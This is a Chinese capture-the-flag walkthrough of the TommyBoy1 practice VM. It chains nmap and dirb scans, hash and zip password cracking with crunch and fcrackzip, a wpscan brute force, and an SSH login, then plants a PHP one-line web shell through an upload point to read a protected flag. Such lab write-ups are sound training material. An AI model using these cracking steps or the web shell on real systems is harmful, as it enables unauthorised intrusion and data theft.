TommyBoy1靶机通关

admin 2025年5月6日17:02:24TommyBoy1靶机通关已关闭评论0 views字数 2799阅读9分19秒阅读模式

一、主机发现

arp-scan -l
TommyBoy1靶机通关

靶机ip为192.168.55.154

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.154
TommyBoy1靶机通关

发现开放了特殊端口8008,开启了http服务

TommyBoy1靶机通关

UDP端口扫描

nmap -sU --min-rate 10000 -p- 192.168.55.154

靶机没有开放UDP端口

2.2目录枚举

dirb http://192.168.55.154

扫出来了很多目录,但是有很多目录是死的,所以需要验活

dirb http://192.168.55.154 > 
            5.txt
          
cat 5.txt | grep 200
TommyBoy1靶机通关

这样就拿到了目录的信息

2.3漏洞扫描

nmap --script=vuln -p22,80,8008 192.168.55.154

无明显漏洞

2.4指纹识别

nmap 192.168.55.154 -sV -sC -O --version-all
TommyBoy1靶机通关

三、进入靶机网站寻找信息

flag1

访问靶机网页寻找信息

TommyBoy1靶机通关

尝试访问枚举出来的目录拿信息

找到了新信息

TommyBoy1靶机通关

继续访问

前三张都是图片,最后一张是flag

TommyBoy1靶机通关

这样我们成功找到了第一个flag

flag2

继续找其它信息,没有找到,看来只能从网页源代码找信息了

查看网页源码

TommyBoy1靶机通关

翻译后如下

<!--来自 Nick 的评论:备份副本在 Big Tom 的主文件夹中-->
<!--来自理查德的评论:您也能给我访问权限吗?大汤姆是唯一一个有密码的人-->
<!--Nick 的评论:是的,是的,我的处理器一次只能处理一个命令>
<!--理查德的评论:拜托,我会好好地问-->
<!--Nick 的评论:如果你告诉 Tom 停止在公司博客中存储重要信息,我将为你设置管理员权限>
<!--Richard 的评论:成交。博客又在哪里了?-->
" target="_blank" style="color: #576b95; text-decoration: none;">

<!--理查德的评论:啊!我怎么会忘记呢?谢谢-->

访问该视频链接

TommyBoy1靶机通关

那我们需要变换Prehistoric Forest来获得新的信息,经过尝试url如下

http://192.168.55.154/prehistoricforest/
TommyBoy1靶机通关

成功找到了博客页面

在博客中找到了flag2

TommyBoy1靶机通关

访问url拿下flag2

TommyBoy1靶机通关

flag3

接下来继续寻找其它信息,不然这个博客不能登陆进去

点击博客的第一篇文章,发现了提示

TommyBoy1靶机通关

打开后是一张图片,跟youtube上的视频是同一个人

TommyBoy1靶机通关

下载这张图片,看看图片里面有没有其它信息

wget http://192.168.55.154/richard/
            shockedrichard.jpg
          
TommyBoy1靶机通关

查看图片内容发现了一个md5值

TommyBoy1靶机通关

尝试进行解密

TommyBoy1靶机通关

解密结果为spanky

正好第二篇文章需要密码才能查看,输入spanky看看

ok了,可以查看第二篇文章了

第二篇文章总结如下

只有 Big Tom 拥有登录系统的密码
有一个名为 callahanbak.bak 的备份,需要重命名为 index.html
有一个ftp服务,大多数扫描器扫不到,每15分钟上线一次
nick重置了它的账号为,nickburns

稍等一会重新扫描端口,即可找到开放的ftp端口

TommyBoy1靶机通关

使用nickburns登陆ftp端口

ftp 192.168.55.154 65534
账号密码均为nickburns
TommyBoy1靶机通关

成功登陆,里面有一个
readme.txt文件

翻译后的大概意思是服务器中放了一个子文件夹,还有一个文件NickIzL33t
encrypted.zip

还说了需要使用手机进行访问

说明我们需要使用hackbar改UA头进行访问

修改后的UA头如下

Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%
            2F1.0
           baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default
TommyBoy1靶机通关

这个页面告诉我们有一个隐藏的html文件,我们需要进行爆破找到该文件

使用dirbuster工具进行爆破

直接在终端输入dirbuster即可打开该工具

首先修改UA头

TommyBoy1靶机通关

然后配置字典跟爆破路径

TommyBoy1靶机通关

成功爆破出html页面

TommyBoy1靶机通关

成功拿到flag3

flag4

TommyBoy1靶机通关

还有一个压缩文件以及密码提示:

TommyBoy1靶机通关

现在我们来构造密码字典

搜索了一下上映时间是1995年

crunch 13 13 -t bev,%%@@^1995 -o 
            pass.txt
          
-t : template的缩写,表示使用模板(模式)来生成密码。
, 表示包含任意一个大写字母(A-Z)
% 表示包含任意一个数字(0-9)
^ 表示特殊字符
@ 表示任意的小写字母(a-z)

生成了
pass.txt文件,接下来我们需要爆破解压密码

fcrackzip -v -D -u -p 
            pass.txt
           
            t0msp4ssw0rdz.zip
          

爆破出来的密码为bevH00tr$1995

成功解压该文件

TommyBoy1靶机通关

结果这三个ssh跟网页都登陆不了

尝试将密码字典用tom进行筛选,然后再爆破网页的登陆界面

cat 
            rockyou.txt|
           grep tom > 
            tom_rockyou.txt
          

接着使用wpscan进行爆破密码

wpscan --url http://192.168.55.154/prehistoricforest -e u -P 
            tom_rockyou.txt
          

成功爆破出来了一组账号密码

tom
tomtom1

找到了解压后的第三个密码遗漏的数字为1938!!

TommyBoy1靶机通关

使用ssh进行连接

ssh [email protected]
密码为:fatguyinalittlecoat1938!!
TommyBoy1靶机通关

成功拿到shell

找到了flag4

TommyBoy1靶机通关

flag5

给出提示,说flag5在
5.txt中

结合刚刚的信息,我们现在要做的就是将备份文件改为html文件,恢复Callahan Auto的网站

cp 
            callahanbak.bak
           /var/www/html/
            index.html
          
TommyBoy1靶机通关

在根目录下找到了.
5.txt文件,需要www-data用户权限才可以

需要我们在网页中拿到shell,就可以拿下flag5了

在/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS目录下找到了文件上传点

TommyBoy1靶机通关

找到文件上传点

TommyBoy1靶机通关

随后我们可以写入一句话木马

echo"<?php system($_GET[pass]);?>" > 
            cmd.php
          

然后访问网页即可

http://192.168.55.154:8008/NickIzL33t/P4TCH_4D4MS/uploads/
            1.php?pass=cat
           /.
            5.txt
          

成功拿到flag5:Buttcrack

标志 6

随后我们将5个flag组合到一起即可打开
LOOT.ZIP文件

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
TommyBoy1靶机通关

成功拿到了6个flag

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月6日17:02:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TommyBoy1靶机通关https://cn-sec.com/archives/4030941.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.